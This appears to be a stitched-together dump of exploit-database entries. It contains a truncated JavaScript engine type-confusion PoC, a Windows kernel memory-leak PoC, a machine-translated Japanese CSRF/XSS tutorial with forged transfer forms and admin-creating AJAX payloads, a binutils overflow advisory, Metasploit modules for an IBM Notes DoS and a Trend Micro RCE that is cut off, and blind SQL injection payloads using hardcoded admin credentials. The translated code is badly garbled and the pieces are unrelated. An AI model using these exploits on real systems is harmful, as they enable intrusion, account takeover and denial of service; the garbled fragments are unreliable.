let arr = [1.1, 1.1, 1.1, 1.1, 1.1];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
arr[2] = 1.1;
arr[3] = 1.1;
}
let r0 = () => '0';
for (var i = 0; i < 0x1000; i++)
opt(r0);
opt(() => {
arr[0] = {};
return '0';
});
print(arr[1]);
}
main();
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1303&desc=2
We have discovered that the nt!NtQueryObject syscall handler discloses portions of uninitialized pool memory to user-mode clients when the following conditions are met:
a) It is invoked with the ObjectNameInformation information class and a file object associated with a file on local disk (other configurations were not tested).
b) The provided buffer is too short to contain even the first part of the output data, i.e. the name of the harddisk volume device (e.g. "\Device\HarddiskVolume2").
By empirically testing the system call in the above set up, we have found that it actually behaves in five different ways depending on the length of the output buffer:
a) From 1 to 7 (32-bit) or 15 (64-bit): no output, syscall returns STATUS_INFO_LENGTH_MISMATCH.
b) From 8/16 to N-1 (N being size required to store the name of the volume device): uninitialized pool memory is disclosed to user-mode, syscall returns STATUS_BUFFER_OVERFLOW.
c) From N to N+1: partial path is copied to user-mode, syscall returns STATUS_OBJECT_PATH_INVALID.
d) From N+2 to M-1 (M being the size required to store the entire output data): partial path is copied to user-mode, syscall returns STATUS_BUFFER_OVERFLOW.
e) From M to ...: full path is copied to user-mode, syscall returns STATUS_SUCCESS.
The issue is of course with case (b); it means that between 1 and about 56 bytes of uninitialized kernel pool memory can be leaked with a single nt!NtQueryObject call.
The attached proof of concept program has been tested on 32 and 64-bit builds of Windows 7. It dumps the data leaked by the affected syscall in each subsequent iteration, and then waits for user interaction (ENTER key press) before executing the next one. When the Special Pools mechanism is enabled for ntoskrnl.exe, the PoC output should be similar to the following:
--- cut ---
00000000: e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 ................
00000010: e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 ................
00000020: e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 ................
00000030: e1 e1 e1 e1 e1 e1 e1 ?? ?? ?? ?? ?? ?? ?? ?? ?? ................
00000000: 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 ################
00000010: 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 ################
00000020: 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 ################
00000030: 23 23 23 23 23 23 23 ?? ?? ?? ?? ?? ?? ?? ?? ?? #######.........
00000000: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
00000010: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
00000020: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
00000030: 2d 2d 2d 2d 2d 2d 2d ?? ?? ?? ?? ?? ?? ?? ?? ?? -------.........
00000000: 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 7777777777777777
00000010: 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 7777777777777777
00000020: 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 7777777777777777
00000030: 37 37 37 37 37 37 37 ?? ?? ?? ?? ?? ?? ?? ?? ?? 7777777.........
--- cut ---
A different repeated marker byte (inserted by Special Pools upon allocation) is displayed each time, which means that uninitialized data from new pool allocations is disclosed to the user-mode client in each attempt.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <winternl.h>
#include <ntstatus.h>
#include <cstdio>
#define ObjectNameInformation ((OBJECT_INFORMATION_CLASS)1)
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
int main() {
BOOL wow64 = FALSE;
if (!IsWow64Process(GetCurrentProcess(), &wow64) || wow64) {
printf("The program has to be built for the native architecture of your OS (x86 or x64).\n");
return 1;
}
HANDLE hFile = CreateFile(L"C:\\Windows\\system32\\svchost.exe", FILE_READ_ATTRIBUTES, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf("CreateFile failed, %d\n", GetLastError());
return 1;
}
BYTE OutputBuffer[0x100];
ULONG ReturnLength;
ULONG MaximumLeakLength;
for (MaximumLeakLength = 0; MaximumLeakLength < sizeof(OutputBuffer); MaximumLeakLength++) {
NTSTATUS st = NtQueryObject(hFile, ObjectNameInformation, OutputBuffer, MaximumLeakLength, &ReturnLength);
if (st == STATUS_OBJECT_PATH_INVALID) {
MaximumLeakLength--;
break;
}
}
while (1) {
RtlZeroMemory(OutputBuffer, sizeof(OutputBuffer));
NTSTATUS st = NtQueryObject(hFile, ObjectNameInformation, OutputBuffer, MaximumLeakLength, &ReturnLength);
if (st != STATUS_BUFFER_OVERFLOW) {
printf("NtQueryObject failed, %x\n", st);
CloseHandle(hFile);
return 1;
}
PrintHex(OutputBuffer, MaximumLeakLength);
getchar();
}
CloseHandle(hFile);
return 0;
}
0x01 CSRF定義
CSRF(クロスサイトリクエスト偽造)、中国語名:クロスサイトリクエスト偽造、知られている:ワンクリック攻撃/セッションライディング、略語:CSRF/XSRF。クロスサイトスクリプトXSSのように聞こえますが、サイト内の信頼できるユーザーを悪用するXSSとは大きく異なりますが、CSRFは信頼できるユーザーからの要求を装って信頼できるWebサイトを悪用します。 XSS攻撃と比較して、CSRF攻撃はあまり人気が低く(したがって、それらを防ぐためのリソースがかなり少ない)、予防が困難であるため、XSSよりも危険であると考えられています。
0x02 CSRFハザード
攻撃者はあなたの身元を盗み、あなたの名前で悪意のあるリクエストを送信しました。 CSRFにできること:電子メールの送信、メッセージの送信、アカウントの盗み、さらには商品の購入、仮想通貨からの送金.問題が発生した問題:個人のプライバシー漏れと不動産セキュリティが含まれます。
0x03 CSRF脆弱性の原因
CSRFの脆弱性の原因は、ブラウザでWebサイトのCookieが期限切れにならないことです。このウェブサイトにアクセスする限り、ブラウザがクローズまたはログアウトしていない限り、デフォルトでログインしたステータスになります。この期間中、攻撃者は、作成されたCSRFスクリプトまたはCSRFスクリプトを含むリンクを送信します。この操作は、ユーザーが実際に実行したいものではありません。
0x04
CSRFとXSS XSSの違い:
攻撃者は、XSSの脆弱性——コンストラクトコード——被害者に送られた——被害者を発見しました——攻撃者が被害者のCookie ——を取得して攻撃を完了しました
CSRF:
攻撃者は、CSRFの脆弱性——コンストラクトコード——被害者に送信された——被害者に——人を開設し、攻撃を完了するためにコード——を実行したことを発見しました
0x05
CSRFの原則次の図は、CSRF攻撃のアイデアを簡単に説明しています。
上記の図からわかるように、CSRF攻撃を完了するには、被害者は次の2つのステップを完了する必要があります。
1.信頼できるWebサイトAにログインし、Cookieをローカルで生成します。
2。ログアウトすることなく、危険なウェブサイトBにアクセスしてください。
上記の2つの条件のいずれかが満たされていない場合、CSRFに攻撃されません。はい、それは本当ですが、次の状況が起こらないことを保証することはできません。
1. Webサイトにログインした後、タブページを開いて別のWebサイトにアクセスしなくなることを保証することはできません。
2。ブラウザを閉じた後、地元のCookieがすぐに期限切れになり、最後のセッションが終了したことを保証することはできません。 (実際、ブラウザを閉じることはセッションを終了することはできませんが、ほとんどの人はブラウザを閉じることはログアウト/エンドセッションと同等であると誤って信じています.)
3.上の写真のいわゆる攻撃のウェブサイトは、他の脆弱性を備えた信頼できる頻繁に訪問されるウェブサイトである可能性があります。
0x06
CSRF攻撃の例
(1).getタイプcsrf
銀行WebサイトA。これは、GETリクエストを使用して、http://www.mybank.com/transfer.php?tobankid=11money=1000などの銀行譲渡事業を完了します。
次に、短いファイルでURLリンクを相手に送信します。それが被害者に送られている限り、それはトリガーされます
https://0x9.me/m5beh
(2).post-type csrf
上記の問題を排除するために、銀行は譲渡操作を完了するためにPOSTリクエストを使用することを決定しました。
銀行のウェブサイトAのWebフォームは次のとおりです。
format='transfer.php'method=' post '
ptobankid:inputtype='text'name=' tobankid '//p
pmoney:inputtype='text'name=' money '//p
pinputType='submit'Value='転送'//p
/形状
バックグラウンド処理ページTransfer.phpは次のとおりです。
?php
session_start();
if(Isset($ _ request ['tobankid'] isset($ _ request ['money']))
{
buy_stocks($ _ request ['tobankid']、$ _request ['money']);
}
?
上記のフォームを偽造してBk.htmlとして保存することにより、Bk.htmlをhttp://www.backlion.org/bk.htmlの下に置くと、URLをクリックするだけで転送がトリガーされます。
(3)最初の2つの痛みを伴うレッスンの後、銀行は要求されたデータを取得する方法を変更することを決定し、$ _POSTを使用して、POSTで要求されたデータのみを取得します。バックグラウンド処理ページTransfer.phpコードは次のとおりです。
?php
session_start();
if(isset($ _ post ['tobankid'] isset($ _ post ['money']))
{
buy_stocks($ _ post ['tobankid']、$ _post ['money']);
}
?
ただし、偽造フォームは同時に変更できます。
HTML
頭
scriptType='text/javascript'
functionsteal()
{
iframe=document.frames ['steal'];
iframe.document.submit( '転送');
}
/スクリプト
/頭
bodyonload='steal()'
iframename='steal'display=' none '
formmethod='post'name='転送'アクション=' http://ww.mybank.com/transfer.php '
inputtype='hidden'name=' tobankid'value='11 '
inputtype='hidden'name=' money'value='1000'
/形状
/iframe
/体
/HTML
上記の3つの例を要約するために、CSRFの主な攻撃モードは基本的に上記の3つであり、そのうち1番目と2番目が最も深刻であり、トリガー条件は非常に単純であり、URL接続で十分であるため、3番目のタイプはよりトラブルであり、javaScriptを必要とするため、以前のものよりもはるかに低くなります。ただし、いずれにせよ、CSRF攻撃がトリガーされている限り、結果は非常に深刻な場合があります。
上記の3つの攻撃モードを理解すると、CSRF攻撃がWebの暗黙的な認証メカニズムに由来することが実際にわかります。 Webの認証メカニズムは、リクエストがユーザーのブラウザからのものであることを保証できますが、リクエストがユーザーによって承認されることを保証することはできません。
0x07
CSRF実用的な例
(1)。ポスト
のCSRFの実用的な例最初にターゲットサイトを見つけます。 CSRFの害は、主に操作を実行できる場所に存在します。次に、私が構築した環境でログインした後、ページをテストします。
環境はWordPress環境です。公式ウェブサイトで直接ダウンロードできます
テストのためにユーザーインターフェイスを選択しましたが、現在1人のユーザーしかいないことがわかります
次に、ユーザーを追加します
げっぷを使用してカットします
Burpの独自のプラグインを使用して、CSRFを利用します
使用できるCSRF.htmlを生成します
ラベル内の値を変更して、追加されたユーザーが繰り返し追加できないようにします。
ブラウザで試してみてください
キーを実行した後、通常の手段で参加した元の最初のユーザーとユーザーに加えて、新しいtest1ユーザーが追加されたことがわかりました。このユーザーは、CSRFを使用して写真の送信をクリックして実行する操作です。テストはページを変更せず、直接連絡したためです。攻撃者がJSを使用してユーザーに直接トリガーできる場合、対応するページが開かれている限り、この動作は実行されます。
(2).combination csrf+xss
の使用率人々がHTMLを悪用するのは容易ではなく、脆弱性のトリガーは複雑であるため、このトリガー方法をシンプルにする方法を見つけます。
XSSの脆弱性を使用して、CSRFの脆弱性をトリガーし、ユーザーが追加した操作を完了します。
最初に送信されたパケットのコンテンツを理解する必要があります
上記のXSSプラットフォームを開き、CSRFプロジェクトを作成します。コードを書きましょう
Span Data-Wiz-Span='Data-Wiz-Span' Style='Font-Style:
普通; font-size: 0.875Rem; font-family: Microsoft yahei; Color: RGB(51、51、51); background-color: RGB(255、255、
255); 'var xmlhttp;
if(window.xmlhttprequest){
xmlhttp=new
xmlhttprequest();
}それ以外{
xmlhttp=new
ActiveXObject( 'microsoft.xmlhttp');
}
xmlhttp.open( 'post'、 'http://www.backlion.org/wordpress/wp-admin/user-new.php'、true);
xmlhttp.setRequestheader( 'content-type'、 'application/x-www-form-urlencoded');
xmlhttp.send( 'action=createuser_wponce ..');
//ここで投稿データを入力すると、ユーザー名とパスワード /スパンを変更する必要があります
このコードをプロジェクトのコード構成に貼り付けます
次に、メッセージ内の保存されたXSSの脆弱性を介して、利用可能なコードをターゲットサイトに保存します
メッセージが成功した後の効果は次のとおりです
管理者がメッセージをチェックすると、危険なコードを実行し、ユーザーを追加するリクエストを送信します
test2ユーザーはユーザーリストを表示した後に正常に追加されました
この時点で、CSRFの攻撃例はほぼ完了していると言えます。将来、自分でそれを掘り下げなければなりません。
(3)。 Ajaxを使用して、CSRF攻撃のXSSを組み合わせます
攻撃効果を達成するために、CSRFのAJAX要求をXSSに入れることです
テストに使用されるこのCMSの掲示板には、ストレージXSSの脆弱性があります。
ここでは、csrftesterを使用してAjaxを生成できます
Ajaxの中核部分を見ることができます
単純なAjaxを自分で書くこともできます
Span Data-Wiz-Span='Data-Wiz-Span' Style='Font-Style:
普通; font-size: 0.875Rem; font-family: Microsoft yahei; Color: RGB(51、51、51); background-color: RGB(255、255、
255); 'var xmlhttp;
if(window.xmlhttprequest){
xmlhttp=new
xmlhttprequest();
}それ以外{
xmlhttp=new
ActiveXObject( 'microsoft.xmlhttp');
}
xmlhttp.open( 'post'、 'http://192.168.109:99/admin/admin_manage.asp?act=add'、true);
xmlhttp.setRequestheader( 'content-type'、 'application/x-www-form-urlencoded');
xmlhttp.send( 'admin=789password=789password3=789button=data');/span
XSSプラットフォームでプロジェクトを構成します
次に、テストWebサイトの掲示板に挿入します
管理者は、メッセージ情報を確認して管理者アカウントを追加できます
(4).phpcmsv9反射性XSSからCSRF
に管理者アカウントを追加しますPHPCMS V9は、PHP5+MySQLを技術的な基盤として使用して開発されたPHPオープンソースコンテンツ管理システムです。現在、多くの業界ポータル、地元のポータル、政府機関などがこのCMSを使用しているか、二次開発を行っています。
PC_HASHの値は、CSSRF防御を実行するためにバックグラウンドで使用されるトークンです。 XSSの脆弱性を前景で発見できる場合、PC_HASH(CSRFトークン)を簡単に取得でき、CSRFの脆弱性をトリガーできます。
反射性XSSを探しています
\ phpcms \ modules \ admin \ plugin.php file public_appcenter_ajx_detail関数(411行にあります)。
/**
*
非同期通話の詳細
*
ここに説明を入力してください.
*/
公共
function public_appcenter_ajx_detail(){
$ id=intval($ _ get ['id']);
$ data=file_get_contents( 'http://open.phpcms.cn/index.php?m=openc=apia=get_detail_byappidid='。$ id);
//$ data=json_decode($ data、true);
echo $ _get ['jsoncallback']。 '('、$ data、 ')';
出口;
}
$ _get ['jsoncallback']は、フィルタリングせずにページに直接出力されます。これは反射的なXSS脆弱性です。
/index.php?m=adminc=plugina=public_appcenter_ajx_detailjsoncallback=script
src=http://www.xsser.com/xss.js/script
反射性XSSを使用して、PC_HASH値を取得します
PC_HASHとXSSの脆弱性により、ユーザーが攻撃者の慎重に構築されたボタンをクリックする限り、攻撃者は攻撃を開始できます。
管理者の権限を追加するためにユーザーを構築するには、最初にadmin_manage_codeを取得する必要があります。
XSSプラットフォームを使用して、CSRF攻撃を起動します
var request=false;
if(window.xmlhttprequest){
リクエスト
=new xmlhttprequest();
もし
(Request.OverRideMimeType){
request.overridemimeType( 'text/xml')
}
} else if(window.activexobject){
var
バージョン=['microsoft.xmlhttp'、 'msxml.xmlhttp'、 'microsoft.xmlhttp'、 'msxml2.xmlhttp.7.0'、
'msxml2.xmlhttp.6.0'、 'msxml2.xmlhttp.5.0'、 'msxml2.xmlhttp.4.0'、 'msxml2.xmlhttp.3.0'、
'msxml2.xmlhttp'];
のために
(var i=0; i versions.length; i ++){
試す {
リクエスト
=new ActiveXObject(バージョン[i])
} catch(e){}
Source: https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
Description:
binutils is a set of tools necessary to build programs.
The complete ASan output of the issue:
# nm -A -a -l -S -s --special-syms --synthetic --with-symbol-versions -D $FILE
==3235==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x613000000512 at pc 0x7f7c93ae3c88 bp 0x7ffe38d7a970 sp 0x7ffe38d7a968
READ of size 1 at 0x613000000512 thread T0
#0 0x7f7c93ae3c87 in read_1_byte /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10
#1 0x7f7c93ae3c87 in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2311
#2 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
#3 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
#4 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
#5 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
#6 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
#7 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
#8 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
#9 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
#10 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
#11 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
#12 0x41ac18 in _init (/usr/x86_64-pc-linux-gnu/binutils-bin/git/nm+0x41ac18)
0x613000000512 is located 0 bytes to the right of 338-byte region [0x6130000003c0,0x613000000512)
allocated by thread T0 here:
#0 0x4d8e08 in malloc /var/tmp/portage/sys-libs/compiler-rt-sanitizers-5.0.0/work/compiler-rt-5.0.0.src/lib/asan/asan_malloc_linux.cc:67
#1 0x7f7c9393a37c in bfd_malloc /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/libbfd.c:193:9
#2 0x7f7c9392fb2f in bfd_get_full_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/compress.c:248:21
#3 0x7f7c939696d3 in bfd_simple_get_relocated_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/simple.c:193:12
#4 0x7f7c93ade26e in read_section /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:556:8
#5 0x7f7c93adef3c in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2047:9
#6 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
#7 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
#8 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
#9 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
#10 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
#11 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
#12 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
#13 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
#14 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
#15 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
SUMMARY: AddressSanitizer: heap-buffer-overflow /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10 in read_1_byte
Shadow bytes around the buggy address:
0x0c267fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c267fff8060: 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa fa
0x0c267fff8070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c267fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c267fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c267fff80a0: 00 00[02]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3235==ABORTING
Affected version:
2.29.51.20170921 and maybe past releases
Fixed version:
N/A
Commit fix:
https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=515f23e63c0074ab531bc954f84ca40c6281a724
Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.
CVE:
CVE-2017-14939
Reproducer:
https://github.com/asarubbo/poc/blob/master/00370-binutils-heapoverflow-read_1_byte
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42970.zip
Timeline:
2017-09-21: bug discovered and reported to upstream
2017-09-24: upstream released a patch
2017-09-26: blog post about the issue
2017-09-29: CVE assigned
Note:
This bug was found with American Fuzzy Lop.
This bug was identified with bare metal servers donated by Packet. This work is also supported by the Core Infrastructure Initiative.
Permalink:
https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42970.zip
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => "IBM Notes encodeURI DOS",
'Description' => %q(
This module exploits a vulnerability in the native browser that
comes with IBM Lotus Notes.
If successful, it could cause the Notes client to hang and have
to be restarted.
),
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra',
],
'References' => [
[ 'EXPLOIT-DB', '42602'],
[ 'CVE', '2017-1129' ],
[ 'URL', '
http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
],
'DisclosureDate' => 'Aug 31 2017',
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
exploit # start http server
end
def setup
@html = %|
<html><head><title>DOS</title>
<script type="text/javascript">
while (true) try {
var object = { };
function d(d0) {
var d0 = (object instanceof encodeURI)('foo');
}
d(75);
} catch (d) { }
</script>
</head></html>
|
end
def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)
end
end
# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files
## About The Product :
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.
## Vulnerability :
The functions.php file line 88 has hardcoded admin credentials.
elseif($uType == 'admin'){
//$_SESSION['user_id'] = $row['sid'];
if($userName == 'admin' && $password == 'admin123'){
$_SESSION['user_id'] = 0;
$_SESSION['user_name'] = 'Administrator';
$_SESSION['user_type'] = 'admin';
header('Location: '.WEB_ROOT.'index.php');
exit;
Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.
-HTTP Method : GET
- Sqlmap command: sqlmap -u 'http://192.168.1.104/view.php?mod=admin&view=repod&id=plans' --cookie="PHPSESSID=t1bc9vj67odrj3bd096g0rffe0"
- Sqlmap Output :
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[00:47:53] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 22 to 40 columns'
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 42 to 60 columns'
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 62 to 80 columns'
[00:47:54] [INFO] testing 'MySQL UNION query (98) - 82 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 650 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: mod=admin&view=repod&id=plans WHERE 6586=6586 AND 9310=9310#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: mod=admin&view=repod&id=plans WHERE 3317=3317 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(4063=4063,1))),0x7170766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: mod=admin&view=repod&id=plans WHERE 4122=4122 AND (SELECT * FROM (SELECT(SLEEP(5)))zWVH)--
---
[00:47:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0
[00:47:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 444 times
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
'Description' => %q{
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
terminal command under the context of the web server user.
The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product
have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which
leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process
does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
unauthenticated users can execute a terminal command under the context of the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # author of command injection
'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 8445
},
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => '-bind'
},
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [[ 'Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "Oct 7 2017",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/'])
]
)
end
def extract_jsessionid
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
})
if res && res.code == 200 && res.body.include?('JSEEEIONID')
res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last
else
nil
end
end
def widget_auth(jsessionid)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'widget', 'index.php'),
'cookie' => "CurrentLocale=en-U=en_US; JSESSIONID=#{jsessionid}"
})
if res && res.code == 200 && res.body.include?('USER_GENERATED_WIDGET_DIR')
res.get_cookies
else
nil
end
end
def check
# If we've managed to bypass authentication, that means target is most likely vulnerable.
jsessionid = extract_jsessionid
if jsessionid.nil?
return Exploit::CheckCode::Safe
end
auth = widget_auth(jsessionid)
if auth.nil?
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Appears
end
end
def exploit
print_status('Extracting JSESSIONID from publicly accessible log file')
jsessionid = extract_jsessionid
if jsessionid.nil?
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
else
print_good("Awesome. JSESSIONID value = #{jsessionid}")
end
print_status('Initiating session with widget framework')
cookies = widget_auth(jsessionid)
if cookies.nil?
fail_with(Failure::NoAccess, "Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA")
else
print_good('Session with widget framework successfully initiated.')
end
print_status('Trigerring command injection vulnerability')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'widget', 'proxy_controller.php'),
